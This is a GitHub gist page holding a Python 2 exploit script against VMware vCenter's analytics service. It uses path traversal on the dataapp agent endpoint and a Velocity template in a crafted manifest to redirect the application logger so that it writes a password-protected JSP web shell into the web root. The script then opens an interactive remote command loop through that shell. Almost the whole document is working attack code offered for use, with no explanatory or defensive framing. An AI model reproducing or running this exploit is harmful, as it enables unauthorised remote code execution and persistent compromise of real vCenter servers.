Forked from testanull/asdklajsdlkajsdlkajsdakjsdhalskdasdioasiodaklsd.py
Created
October 4, 2021 12:28
-
-
Save numanturle/18c0d9e5920719ee90d71a376fbaad63 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import random | |
import string | |
import sys | |
import time | |
import requests | |
import urllib3 | |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
def id_generator(size=6, chars=string.ascii_lowercase + string.digits): | |
return ''.join(random.choice(chars) for _ in range(size)) | |
def escape(_str): | |
_str = _str.replace("&", "&") | |
_str = _str.replace("<", "<") | |
_str = _str.replace(">", ">") | |
_str = _str.replace("\"", """) | |
return _str | |
def run_shell(url, pwd, cmd): | |
burp0_url = url | |
burp0_headers = {"User-Agent": "Mozilla/5.0", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"} | |
burp0_data = {pwd: cmd.strip()} | |
ct = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, verify=False).content | |
ct = ct.split('<pre>')[1].split('</pre>')[0] | |
return ct | |
def createAgent(url, agent_name): | |
burp0_url = url + "/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c="+agent_name+"&_i=test2" | |
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"} | |
burp0_json={"manifestSpec":{}, "objectType": "a2", "collectionTriggerDataNeeded": True,"deploymentDataNeeded":True, "resultNeeded": True, "signalCollectionCompleted":True, "localManifestPath": "a7","localPayloadPath": "a8","localObfuscationMapPath": "a9" } | |
requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False) | |
pwd = id_generator(6) | |
agent_name = id_generator(6) | |
shell_name = id_generator(6)+".jsp" | |
manifestData = """<manifest recommendedPageSize="500"> | |
<request> | |
<query name="vir:VCenter"> | |
<constraint> | |
<targetType>ServiceInstance</targetType> | |
</constraint> | |
<propertySpec> | |
<propertyNames>content.about.instanceUuid</propertyNames> | |
<propertyNames>content.about.osType</propertyNames> | |
<propertyNames>content.about.build</propertyNames> | |
<propertyNames>content.about.version</propertyNames> | |
</propertySpec> | |
</query> | |
</request> | |
<cdfMapping> | |
<indepedentResultsMapping> | |
<resultSetMappings> | |
<entry> | |
<key>vir:VCenter</key> | |
<value> | |
<value xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="resultSetMapping"> | |
<resourceItemToJsonLdMapping> | |
<forType>ServiceInstance</forType> | |
<mappingCode><![CDATA[ | |
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().setFile("/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/%s") | |
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().activateOptions() | |
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().setAppend(false) | |
$GLOBAL-logger.info('<%%@ page import="java.util.*,java.io.*"%%><HTML><BODY><FORM METHOD="GET" NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Send"></FORM><pre><%%if (request.getParameter("%s") != null) { Process p = Runtime.getRuntime().exec(request.getParameter("%s")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } }%%></pre></BODY></HTML>') | |
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().setFile("/var/log/vmware/analytics/analytics.log") | |
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().activateOptions() | |
$GLOBAL-logger.getLogger().getParent().getAllAppenders().nextElement().setAppend(true) | |
#set($modelKey = $LOCAL-resourceItem.resourceItem.getKey())## | |
#set($objectId = "vim.ServiceInstance:$modelKey.value:$modelKey.serverGuid")## | |
#set($obj = $LOCAL-cdf20Result.newObject("vim.ServiceInstance", $objectId))## | |
$obj.addProperty("OSTYPE", "asdasda")## | |
$obj.addProperty("BUILD", $content-about-build)## | |
$obj.addProperty("VERSION", $content-about-version)##]]> | |
</mappingCode> | |
</resourceItemToJsonLdMapping> | |
</value> | |
</value> | |
</entry> | |
</resultSetMappings> | |
</indepedentResultsMapping> | |
</cdfMapping> | |
<requestSchedules> | |
<schedule interval="1h"> | |
<queries> | |
<query>vir:VCenter</query> | |
</queries> | |
</schedule> | |
</requestSchedules> | |
</manifest>""" % (shell_name, pwd, pwd) | |
target = sys.argv[1] | |
print "Target: "+ target | |
print "Creating Agent (of SHIELD) ..." | |
createAgent(target, agent_name) | |
print "Collecting Agent (of SHIELD) ..." | |
burp0_url = target+"/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c="+agent_name+"&_i=test2" | |
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0", "X-Deployment-Secret": "abc", "Content-Type": "application/json", "Connection": "close"} | |
burp0_json={"contextData": "a3", "manifestContent": manifestData, "objectId": "a2"} | |
requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False, proxies={"https":"http://127.0.0.1:8080"}) | |
print "Success!" | |
print "Shell: " + target+"/idm/..;/"+shell_name | |
print "Pwd: "+ pwd | |
print "Launching pseudo shell ..." | |
while True: | |
cmd = raw_input("/remote_shell/# ").strip() | |
if(cmd =="quit"): | |
sys.exit(-1) | |
output = run_shell(target+"/idm/..;/"+shell_name,pwd, cmd) | |
time.sleep(1) | |
print(output) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment